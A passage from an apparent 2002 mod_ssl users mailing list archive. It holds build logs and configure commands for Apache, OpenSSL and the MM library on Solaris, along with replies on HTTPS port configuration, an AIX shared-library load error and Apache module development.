file.lo... yes checking if gcc supports -fno-rtti -fno-exceptions ... yes checking if gcc static flag -static works... -static checking whether ln -s works... yes checking for ld used by GCC... /usr/local/bin/ld checking if the linker (/usr/local/bin/ld) is GNU ld... yes checking whether the linker (/usr/local/bin/ld) supports shared libraries... yes checking for BSD-compatible nm... /usr/ccs/bin/nm -p checking command to parse /usr/ccs/bin/nm -p output... ok checking how to hardcode library paths into programs... immediate checking for /usr/local/bin/ld option to reload object files... -r checking dynamic linker characteristics... solaris2.8 ld.so checking if libtool supports shared libraries... yes checking whether to build shared libraries... no checking whether to build static libraries... yes checking for objdir... .libs creating libtool Platform Environment: checking for stdio.h... (cached) yes checking for stdlib.h... (cached) yes checking for string.h... (cached) yes checking for errno.h... (cached) yes checking for limits.h... (cached) yes checking for unistd.h... (cached) yes checking for fcntl.h... (cached) yes checking for sys/stat.h... (cached) yes checking for sys/types.h... (cached) yes decision on mandatory system headers... all fine checking for memory.h... (cached) yes checking for memcpy... (cached) yes checking for memset... (cached) yes checking for bcopy... (cached) yes checking for _POSIX_PATH_MAX in limits.h... (cached) yes checking for PATH_MAX in limits.h... (cached) yes checking for MAXPATHLEN in sys/param.h... (cached) yes checking for _POSIX_CHILD_MAX in limits.h... (cached) yes checking for CHILD_MAX in limits.h... (cached) yes Virtual Memory Page Size: checking for unistd.h... (cached) yes checking for kernel/OS.h... (cached) no checking for getpagesize... (cached) yes checking for sysconf... (cached) yes checking for _SC_PAGESIZE in unistd.h... (cached) yes checking for B_PAGE_SIZE in kernel/OS.h... (cached) no decision on memory page size determination... POSIX.1 sysconf(_SC_PAGESIZE) Shared Memory Implementation: checking for sys/mman.h... (cached) yes checking for MAP_ANON in sys/mman.h... (cached) yes checking for mmap... (cached) yes checking for munmap... (cached) yes checking for shm_open... (cached) no checking for shm_unlink... (cached) no checking for /dev/zero... (cached) yes checking for sys/ipc.h... (cached) yes checking for sys/shm.h... (cached) yes checking for sys/file.h... (cached) yes checking for shmget... (cached) yes checking for shmat... (cached) yes checking for shmdt... (cached) yes checking for shmctl... (cached) yes checking for kernel/OS.h... (cached) no checking for create_area... (cached) no decision on shared memory allocation method... 4.4BSD-style mmap() via MAP_ANON checking for shared memory maximum segment size... 64MB (soft limit) Mutual Exclusion Implementation: checking for sys/ipc.h... (cached) yes checking for sys/sem.h... (cached) yes checking for sys/file.h... (cached) yes checking for semget... (cached) yes checking for semctl... (cached) yes checking for LOCK_EX in sys/file.h... (cached) no checking for F_SETLK in fcntl.h... (cached) yes checking for IPC_PRIVATE in sys/ipc.h... (cached) yes checking for SEM_UNDO in sys/sem.h... (cached) yes checking for kernel/OS.h... (cached) no checking for create_sem... (cached) no checking whether union semun is defined in sys/sem.h... no decision on mutex implementation method... SysV IPC semget() Output Substitution: creating ./config.status creating Makefile creating mm-config creating mm_conf.h mm_conf.h is unchanged Now please type `make' to compile. Good luck. configuring mod_ssl: -------------------- root@wowebref01 mod_ssl-2.8.6-1.3.23 # ./configure --with-apache=../apache_1.3.23 --with-ssl=../openssl-0.9.6c --with-mm=../mm-1.1.3 --prefix=/opt/apache_1.3.23 --disable-rule=SSL_COMPAT | tee -a conf.out Configuring mod_ssl/2.8.6 for Apache/1.3.23 + Apache location: ../apache_1.3.23 (Version 1.3.23) + OpenSSL location: ../openssl-0.9.6c + MM location: ../mm-1.1.3 + Auxiliary patch tool: ./etc/patch/patch (local) + Applying packages to Apache source tree: o Extended API (EAPI) o Distribution Documents o SSL Module Source o SSL Support o SSL Configuration Additions o SSL Module Documentation o Addons Done: source extension and patches successfully applied. Configuring for Apache, Version 1.3.23 + using installation path layout: Apache (config.layout) Creating Makefile Creating Configuration.apaci in src Creating Makefile in src + configured for Solaris 280 platform + setting C pre-processor to gcc -E + checking for system header files + adding selected modules o ssl_module uses ConfigStart/End + SSL interface: mod_ssl/2.8.6 + SSL interface build type: OBJ + SSL interface compatibility: disabled + SSL interface experimental code: disabled + SSL interface conservative code: disabled + SSL interface vendor extensions: disabled + SSL interface plugin: Vendor DBM (libc) + SSL library path: /opt/installstuff/sources/openssl-0.9.6c + SSL library version: OpenSSL 0.9.6c 21 dec 2001 + SSL library type: source tree only (stand-alone) + enabling Extended API (EAPI) using MM library: ../../mm-1.1.3 (source-tree only) + using builtin Expat + checking sizeof various data types + doing sanity check on compiler and options Creating Makefile in src/support Creating Makefile in src/os/unix Creating Makefile in src/ap Creating Makefile in src/main Creating Makefile in src/lib/expat-lite Creating Makefile in src/modules/standard Creating Makefile in src/modules/ssl Now proceed with the following commands: $ cd ../apache_1.3.23 $ make $ make certificate $ make install -- T-Online International AG DCM Waldstrasse 3 64331 Weiterstadt Tel.: +49 (0)6151 680 7512 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 17:16:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA02107; Fri, 8 Feb 2002 17:14:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA02036; Fri, 8 Feb 2002 17:13:22 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id B5EBC4CE5F1; Fri, 8 Feb 2002 17:13:21 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g18GD5a93677; Fri, 8 Feb 2002 17:13:05 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id PAA27602; Fri, 8 Feb 2002 15:41:11 +0100 (MET) Date: Fri, 8 Feb 2002 15:41:11 +0100 (MET) Message-Id: <200202081441.PAA27602@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] SSLMutex lock 'sem' and SSLSessionCache storage 'shm:' not available on Solaris8 (PR#664) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Bert Courtin Version: mod_ssl-2.8.6-1.3.23 OS: sparc-sun-solaris2.8 Submission from: (NULL) (195.243.113.252) Hi, I'm trying to compile the following apache_1.3.23 & mm-1.1.3 & openssl-0.9.6c & mod_ssl-2.8.6-1.3.23 and get SSLMutex lock 'sem' and SSLSessionCache storage 'shm:' available on Solaris8/SPARC (sparc-sun-solaris2.8) - without any success:-( The apache build reports always (I now've tried a few tens combinations of configure options) httpd -L: -------------------------------- SSLMutex (mod_ssl.c) SSL lock for handling internal mutual exclusions (`none', `file:/path/to/file') Allowed in *.conf only outside , or SSLSessionCache (mod_ssl.c) SSL Session Cache storage (`none', `dbm:/path/to/file') Allowed in *.conf only outside , or -------------------------------- Here's what I did: (I've added the output of these commands to this mail, see below): ------------------------------------------------------- apache_1.3.23 # ./configure --prefix=/${TARGET_DIR}/${APACHE}/${PROJEKT} mm-1.1.3 # ./configure --prefix=/${TARGET_DIR}/${MM} --disable-shared --with-sem=IPCSEM openssl-0.9.6c # ./config --prefix=/${TARGET_DIR}/${OPENSSL} -fPIC shared mod_ssl-2.8.6-1.3.23 # ./configure --with-apache=../apache_1.3.23 \ --with-ssl=../openssl-0.9.6c \ --with-mm=../mm-1.1.3 \ --prefix=/opt/apache_1.3.23 \ --disable-rule=SSL_COMPAT cd ../apache_1.3.23 make && make install What's wrong with that respectively where may be the problem - or is there a bug with these releases on my platform? Thank you & kind regards, Bert Courtin ----------------------------------------------------------------- Preconfiguring Apache: ------- root@wowebref01 apache_1.3.23 # ./configure --prefix=/${TARGET_DIR}/${APACHE}/${PROJEKT} Configuring for Apache, Version 1.3.23 + using installation path layout: Apache (config.layout) Creating Makefile Creating Configuration.apaci in src Creating Makefile in src + configured for Solaris 280 platform + setting C pre-processor to gcc -E + checking for system header files + adding selected modules + using builtin Expat + checking sizeof various data types + doing sanity check on compiler and options Creating Makefile in src/support Creating Makefile in src/os/unix Creating Makefile in src/ap Creating Makefile in src/main Creating Makefile in src/lib/expat-lite Creating Makefile in src/modules/standard Configuring mm-1.1.3: --------------------- root@wowebref01 mm-1.1.3 # ./configure --prefix=/${TARGET_DIR}/${MM} --disable-shared --with-sem=IPCSEM | tee -a conf.out Configuring MM (Shared Memory Library), Version 1.1.3 (01-Jul-2000) Copyright (c) 1999-2000 Ralf S. Engelschall, All Rights Reserved. Platform: sparc-sun-solaris2.8 loading cache ./config.cache Build Tools: checking for gcc... (cached) gcc checking whether the C compiler (gcc ) works... yes checking whether the C compiler (gcc ) is a cross-compiler... no checking whether we are using GNU C... (cached) yes checking whether gcc accepts -g... (cached) yes checking how to run the C preprocessor... (cached) gcc -E checking for compilation debug mode... disabled checking whether make sets ${MAKE}... (cached) yes checking for ranlib... ranlib checking for object suffix... o checking for executable suffix... no checking for gcc option to produce PIC... -fPIC checking if gcc PIC flag -fPIC works... yes checking if gcc supports -c -o file.o... yes checking if gcc supports -c -o file.lo... yes checking if gcc supports -fno-rtti -fno-exceptions ... yes checking if gcc static flag -static works... -static checking whether ln -s works... yes checking for ld used by GCC... /usr/local/bin/ld checking if the linker (/usr/local/bin/ld) is GNU ld... yes checking whether the linker (/usr/local/bin/ld) supports shared libraries... yes checking for BSD-compatible nm... /usr/ccs/bin/nm -p checking command to parse /usr/ccs/bin/nm -p output... ok checking how to hardcode library paths into programs... immediate checking for /usr/local/bin/ld option to reload object files... -r checking dynamic linker characteristics... solaris2.8 ld.so checking if libtool supports shared libraries... yes checking whether to build shared libraries... no checking whether to build static libraries... yes checking for objdir... .libs creating libtool Platform Environment: checking for stdio.h... (cached) yes checking for stdlib.h... (cached) yes checking for string.h... (cached) yes checking for errno.h... (cached) yes checking for limits.h... (cached) yes checking for unistd.h... (cached) yes checking for fcntl.h... (cached) yes checking for sys/stat.h... (cached) yes checking for sys/types.h... (cached) yes decision on mandatory system headers... all fine checking for memory.h... (cached) yes checking for memcpy... (cached) yes checking for memset... (cached) yes checking for bcopy... (cached) yes checking for _POSIX_PATH_MAX in limits.h... (cached) yes checking for PATH_MAX in limits.h... (cached) yes checking for MAXPATHLEN in sys/param.h... (cached) yes checking for _POSIX_CHILD_MAX in limits.h... (cached) yes checking for CHILD_MAX in limits.h... (cached) yes Virtual Memory Page Size: checking for unistd.h... (cached) yes checking for kernel/OS.h... (cached) no checking for getpagesize... (cached) yes checking for sysconf... (cached) yes checking for _SC_PAGESIZE in unistd.h... (cached) yes checking for B_PAGE_SIZE in kernel/OS.h... (cached) no decision on memory page size determination... POSIX.1 sysconf(_SC_PAGESIZE) Shared Memory Implementation: checking for sys/mman.h... (cached) yes checking for MAP_ANON in sys/mman.h... (cached) yes checking for mmap... (cached) yes checking for munmap... (cached) yes checking for shm_open... (cached) no checking for shm_unlink... (cached) no checking for /dev/zero... (cached) yes checking for sys/ipc.h... (cached) yes checking for sys/shm.h... (cached) yes checking for sys/file.h... (cached) yes checking for shmget... (cached) yes checking for shmat... (cached) yes checking for shmdt... (cached) yes checking for shmctl... (cached) yes checking for kernel/OS.h... (cached) no checking for create_area... (cached) no decision on shared memory allocation method... 4.4BSD-style mmap() via MAP_ANON checking for shared memory maximum segment size... 64MB (soft limit) Mutual Exclusion Implementation: checking for sys/ipc.h... (cached) yes checking for sys/sem.h... (cached) yes checking for sys/file.h... (cached) yes checking for semget... (cached) yes checking for semctl... (cached) yes checking for LOCK_EX in sys/file.h... (cached) no checking for F_SETLK in fcntl.h... (cached) yes checking for IPC_PRIVATE in sys/ipc.h... (cached) yes checking for SEM_UNDO in sys/sem.h... (cached) yes checking for kernel/OS.h... (cached) no checking for create_sem... (cached) no checking whether union semun is defined in sys/sem.h... no decision on mutex implementation method... SysV IPC semget() Output Substitution: creating ./config.status creating Makefile creating mm-config creating mm_conf.h mm_conf.h is unchanged Now please type `make' to compile. Good luck. configuring mod_ssl: -------------------- root@wowebref01 mod_ssl-2.8.6-1.3.23 # ./configure --with-apache=../apache_1.3.23 --with-ssl=../openssl-0.9.6c --with-mm=../mm-1.1.3 --prefix=/opt/apache_1.3.23 --disable-rule=SSL_COMPAT | tee -a conf.out Configuring mod_ssl/2.8.6 for Apache/1.3.23 + Apache location: ../apache_1.3.23 (Version 1.3.23) + OpenSSL location: ../openssl-0.9.6c + MM location: ../mm-1.1.3 + Auxiliary patch tool: ./etc/patch/patch (local) + Applying packages to Apache source tree: o Extended API (EAPI) o Distribution Documents o SSL Module Source o SSL Support o SSL Configuration Additions o SSL Module Documentation o Addons Done: source extension and patches successfully applied. Configuring for Apache, Version 1.3.23 + using installation path layout: Apache (config.layout) Creating Makefile Creating Configuration.apaci in src Creating Makefile in src + configured for Solaris 280 platform + setting C pre-processor to gcc -E + checking for system header files + adding selected modules o ssl_module uses ConfigStart/End + SSL interface: mod_ssl/2.8.6 + SSL interface build type: OBJ + SSL interface compatibility: disabled + SSL interface experimental code: disabled + SSL interface conservative code: disabled + SSL interface vendor extensions: disabled + SSL interface plugin: Vendor DBM (libc) + SSL library path: /opt/installstuff/sources/openssl-0.9.6c + SSL library version: OpenSSL 0.9.6c 21 dec 2001 + SSL library type: source tree only (stand-alone) + enabling Extended API (EAPI) using MM library: ../../mm-1.1.3 (source-tree only) + using builtin Expat + checking sizeof various data types + doing sanity check on compiler and options Creating Makefile in src/support Creating Makefile in src/os/unix Creating Makefile in src/ap Creating Makefile in src/main Creating Makefile in src/lib/expat-lite Creating Makefile in src/modules/standard Creating Makefile in src/modules/ssl Now proceed with the following commands: $ cd ../apache_1.3.23 $ make $ make certificate $ make install -- T-Online International AG DCM Waldstrasse 3 64331 Weiterstadt Tel.: +49 (0)6151 680 7512 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 17:33:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA03039; Fri, 8 Feb 2002 17:32:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tonnant.cnchost.com id RAA03014; Fri, 8 Feb 2002 17:31:11 +0100 (MET) Received: from sysadmin (system130.CenterBMW.com [63.105.125.130] (may be forged)) by tonnant.cnchost.com id LAA29968; Fri, 8 Feb 2002 11:31:04 -0500 (EST) [ConcentricHost SMTP Relay 1.14] From: "Kent Freeman" To: Subject: RE: apache and mod_ssl Date: Fri, 8 Feb 2002 08:23:22 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 In-reply-to: <20020208000202.36892.qmail@web12402.mail.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kent Freeman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You neet to point your browser to https://www.yourdomain.foo or http://www.yourdomain.foo:443. Unless you are testing from the local http server, you will need to update your DNS with the new domain name(s). You also need to tell Apache to listen on port 443 in the httpd.conf file. If you are using virtual hosts, you will need to add other things in the httpd.conf file like (this config is for name-based v-hosts): NameVirtualHost *:80 NameVirtualHost *:443 Listen 80 Listen 443 SSLEngine on SSLCACertificatePath /usr/local/apache/conf/certs/ SSLCACertificateFile /usr/local/apache/conf/certs/ca.crt SSLCertificateChainFile /usr/local/apache/conf/certs/ca.crt SSLCertificateFile /usr/local/apache/conf/certs/server.crt SSLCertificateKeyFile /usr/local/apache/conf/certs/server.key DocumentRoot /usr/local/apache/htdocs ServerName www.yourdomain.foo [or www.sub.yourdomain.foo] -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of bhawna sinha Sent: Thursday, February 07, 2002 4:02 PM To: modssl-users@modssl.org Subject: apache and mod_ssl I have installed apache web server software and the Apache interface to OpenSSL(mod_ssl) in order to have a secure server. I have changed the configuration file httpd.conf and ssl is enabled on port 443. But the problem is whenever I try the url https://localhost:443, it says cannot connect to server. It seems that it is not able to connect to port 443. Also in the error log it says "invalid method in request". I am attaching the conf file: -------***************************************--------- LoadModule ssl_module modules/mod_ssl.so ServerAdmin bhawna@mailcity.com ServerName 127.0.0.1 SSLMutex sem SSLRandomSeed startup builtin SSLSessionCache none SSLLog logs/ssl.log SSLLogLevel info SSLEngine on SSLCertificateFile conf/ssl/my-server.cert SSLCertificateKeyFile conf/ssl/my-server.key #SSLVerifyClient require #SSLVerifyDepth 1 #SSLCACertificatePath conf/ssl #SSLCACertificateFile conf/ssl/my-server.cert I would appreciate if anyone could give me a solution Thanks Bhawna __________________________________________________ Do You Yahoo!? Send FREE Valentine eCards with Yahoo! Greetings! http://greetings.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 17:34:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA03091; Fri, 8 Feb 2002 17:33:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.sse.ie id RAA03070; Fri, 8 Feb 2002 17:32:41 +0100 (MET) Received: from INSOMNIA (INSOMNIA.sse.ie [193.120.33.128]) by mail1.sse.ie (8.11.1/8.11.1) with SMTP id g18GWZN22098 for ; Fri, 8 Feb 2002 16:32:35 GMT Message-ID: <003901c1b0be$3a8dc950$802178c1@sse.ie> From: "Ronan Daly" To: Subject: Developing new module while using mod_ssl Date: Fri, 8 Feb 2002 16:32:41 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ronan Daly" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I'm looking into creating an apache module, which hopefully will be using mod_ssl for part of its functionality. This module will be linking into an access control product, which will use a users pkc as an identity type. I've been looking through the code, and it seems as if it'll be easy enough to get the information from the request. However this also has to work if the request is normal http. My question would be, would there be any way of knowing which version of request_req has been passed into my function, i.e. the original apache version, or the modified mod_ssl version. This would be done at run time hopefully, but I'm sure I could create two libraries if I had to. Also any opinions on the ease with which this would be done? Thanks for any help -- Ronan ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 19:07:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA08580; Fri, 8 Feb 2002 19:06:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from opiate.divisionbyzero.com id TAA08561; Fri, 8 Feb 2002 19:05:48 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by opiate.divisionbyzero.com (Postfix) with ESMTP id 2068A6FA78 for ; Fri, 8 Feb 2002 10:08:11 -0800 (PST) Subject: Re: apache and mod_ssl From: jon schatz To: modssl-users@modssl.org In-Reply-To: <20020208000202.36892.qmail@web12402.mail.yahoo.com> References: <20020208000202.36892.qmail@web12402.mail.yahoo.com> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-fpkQpJMLGtEU6Lk1gXT6" X-Mailer: Evolution/1.0.2 Date: 08 Feb 2002 10:06:05 -0800 Message-Id: <1013191566.5610.8.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-fpkQpJMLGtEU6Lk1gXT6 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Thu, 2002-02-07 at 16:02, bhawna sinha wrote: > Also in the error log it says "invalid > method in request". that means you're talking SSL to a normal http server. in other words, port 443 is not listening for ssl connections. --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-fpkQpJMLGtEU6Lk1gXT6 Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8ZBONwj1gFegse14RAujIAJ92eMkH7XYu5Ja3352YiZIT6dpJXgCbBL8s t78+DT7tzuR2BYYaMaJiuR8= =BrMK -----END PGP SIGNATURE----- --=-fpkQpJMLGtEU6Lk1gXT6-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 22:12:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16961; Fri, 8 Feb 2002 22:11:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id WAA16957; Fri, 8 Feb 2002 22:10:59 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1C6C54CE523; Fri, 8 Feb 2002 22:10:59 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g18JG8o96167; Fri, 8 Feb 2002 20:16:08 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spiff.wake.tec.nc.us id RAA03888; Fri, 8 Feb 2002 17:52:33 +0100 (MET) Received: from mail.wake.tec.nc.us (loopback [127.0.0.1]) by spiff.wake.tec.nc.us (AIX4.3/8.9.3/8.9.3) with ESMTP id LAA30784 for ; Fri, 8 Feb 2002 11:43:52 -0500 Message-ID: <3C640048.E5ABAF0@mail.wake.tec.nc.us> Date: Fri, 08 Feb 2002 11:43:52 -0500 From: Dale Weaver X-Mailer: Mozilla 4.61i [en] (X11; U; AIX 4.3) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: libssl.so won't load Content-Type: multipart/alternative; boundary="------------AF5A6B44CFEA7B21603EA26D" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Dale Weaver X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --------------AF5A6B44CFEA7B21603EA26D Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit I have an AIX server running 4.3.3. I have installed openssl-0.9.6.3, Apache 1.3.19 and mod_ssl 2.8.2.0. All installed fine, however when I try to start the server I get the errors: Syntax error on line 236 of /etc/apache/httpd.conf: Cannot load /usr/local/lib/apache/libssl.so into server: 0509-022 Cannot load module /usr/local/lib/apache/libssl.so. 0509-150 Dependent module /usr/local/lib/libssl.a(libssl.so) could not be loaded. 0509-152 Member libssl.so is not found in archive 0509-022 Cannot load module /usr/local/lib/libssl.a. 0509-150 Dependent module /usr/local/lib/libssl.a could not be loaded --------------AF5A6B44CFEA7B21603EA26D-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 8 22:26:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA17525; Fri, 8 Feb 2002 22:25:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id WAA17481; Fri, 8 Feb 2002 22:24:16 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA21132 for ; Fri, 8 Feb 2002 16:30:27 -0500 Date: Fri, 8 Feb 2002 16:30:27 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: libssl.so won't load In-Reply-To: <3C640048.E5ABAF0@mail.wake.tec.nc.us> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dale, You maybe running into the ld.so issue that faced a few sun admins trying to install mod-ssl on those systems recently. This would require an update of your systems ld.so system similiar to theirs. The man pages for AIX should give you a clue as to the ways to do this for your AIX system (a symlink from the out of bounds shared mod-ssl lib to the standard ld.so lib dir, the environment variable LD_LIBRARY_PATH, fixing the cache file /etc/ld.so.cache, etc>, as well look at the archives of the past few weeks on these issues for those sun users. Hope this helps, thanks, Ron DuFresne On Fri, 8 Feb 2002, Dale Weaver wrote: > I have an AIX server running 4.3.3. I have installed openssl-0.9.6.3, > > Apache 1.3.19 and mod_ssl 2.8.2.0. All installed fine, however > > when I try to start the server I get the errors: > > Syntax error on line 236 of /etc/apache/httpd.conf: > Cannot load /usr/local/lib/apache/libssl.so into server: 0509-022 Cannot > load module /usr/local/lib/apache/libssl.so. > 0509-150 Dependent module /usr/local/lib/libssl.a(libssl.so) could not be loaded. > 0509-152 Member libssl.so is not found in archive > 0509-022 Cannot load module /usr/local/lib/libssl.a. > 0509-150 Dependent module /usr/local/lib/libssl.a could not be loaded -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 03:01:26 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA00284; Sat, 9 Feb 2002 03:00:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from runt.ebetinc.com id CAA00183; Sat, 9 Feb 2002 02:59:14 +0100 (MET) Received: (from drees@localhost) by runt.ebetinc.com (8.11.6/8.11.6) id g191x9b27219 for modssl-users@modssl.org; Fri, 8 Feb 2002 17:59:09 -0800 Date: Fri, 8 Feb 2002 17:59:09 -0800 From: David Rees To: modssl-users@modssl.org Subject: Re: strange problem with unclean shutdown Message-ID: <20020208175909.A27181@runt.ebetinc.com> Mail-Followup-To: David Rees , modssl-users@modssl.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from a.gietl@e-admin.de on Wed, Jan 23, 2002 at 07:12:35PM +0100 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Rees X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, Jan 23, 2002 at 07:12:35PM +0100, Andreas Gietl wrote: > > > ServerName www.defaulthost.de > ServerAdmin webmaster@defaulthost.de > DocumentRoot /home/defaulthost/public_html > Sorry for the late reply, been on vacation. Does this server host multiple SSL sites? What are you using in your configuration of XXXXXXX? Can you replace XXXXXXX with * or the IP address of the virtual host? -Dave ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 03:02:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA00325; Sat, 9 Feb 2002 03:01:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA00314; Sat, 9 Feb 2002 03:00:55 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id BA38A4CE693; Sat, 9 Feb 2002 03:00:54 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g18LBTN99590; Fri, 8 Feb 2002 22:11:29 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bilbo.in.mat.cc id TAA10319; Fri, 8 Feb 2002 19:46:36 +0100 (MET) Received: from bilbo.org (localhost [127.0.0.1]) by bilbo.in.mat.cc (Postfix) with ESMTP id B1B5771055 for ; Fri, 8 Feb 2002 19:46:18 +0100 (CET) Received: from club-internet.fr (sauron.in.mat.cc [212.43.217.122]) by bilbo.in.mat.cc (Postfix) with ESMTP id D5D0F71055 for ; Fri, 8 Feb 2002 19:46:11 +0100 (CET) Message-ID: <3C641CF3.54853C55@club-internet.fr> Date: Fri, 08 Feb 2002 19:46:11 +0100 From: Mathieu Arnold Organization: http://www.absolight.fr/ X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users Subject: https without certificate Content-Type: text/plain; 